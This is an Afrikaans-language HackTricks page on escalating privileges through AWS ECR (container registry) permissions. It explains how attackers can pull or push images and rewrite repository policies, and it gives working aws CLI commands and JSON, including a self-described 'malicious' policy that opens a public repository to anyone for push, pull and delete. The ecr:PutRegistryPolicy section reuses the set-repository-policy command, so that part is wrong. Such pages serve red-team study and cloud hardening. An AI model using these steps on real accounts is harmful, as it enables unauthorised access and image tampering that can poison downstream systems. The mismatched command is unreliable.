AWS - ECR Privesc

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

ECR

`ecr:GetAuthorizationToken`,`ecr:BatchGetImage`

'n Aanvaller met die ecr:GetAuthorizationToken en ecr:BatchGetImage kan inlog op ECR en beelde aflaai.

Vir meer inligting oor hoe om beelde af te laai:

Potensiële Impak: Indirekte priveskakel deur sensitiewe inligting in die verkeer te onderskep.

`ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`

'n Aanvaller met al daardie toestemmings kan inlog op ECR en beelde oplaai. Dit kan nuttig wees om voorregte na ander omgewings te eskaleer waar daardie beelde gebruik word.

Om te leer hoe om 'n nuwe beeld op te laai/op te dateer, kyk:

`ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`

Soos die vorige afdeling, maar vir openbare repositories.

`ecr:SetRepositoryPolicy`

'n Aanvaller met hierdie toestemming kan verander die repository beleid om homself (of selfs almal) lees/skryf toegang te gee. Byvoorbeeld, in hierdie voorbeeld word lees toegang aan almal gegee.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Inhoud van my-policy.json:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

`ecr-public:SetRepositoryPolicy`

Soos die vorige afdeling, maar vir openbare repositories. 'n Aanvaller kan die repository-beleid van 'n ECR Openbare repository wysig om ongeoorloofde openbare toegang te verleen of om hul voorregte te verhoog.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Potensiële Impak: Ongeoorloofde openbare toegang tot die ECR Publieke berging, wat enige gebruiker in staat stel om beelde te stoot, te trek of te verwyder.

`ecr:PutRegistryPolicy`

'n Aanvaller met hierdie toestemming kan die registrasiebeleid verander om homself, sy rekening (of selfs almal) lees/skryf toegang te verleen.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousAWS - EC2 Privesc NextAWS - ECS Privesc

Last updated 3 days ago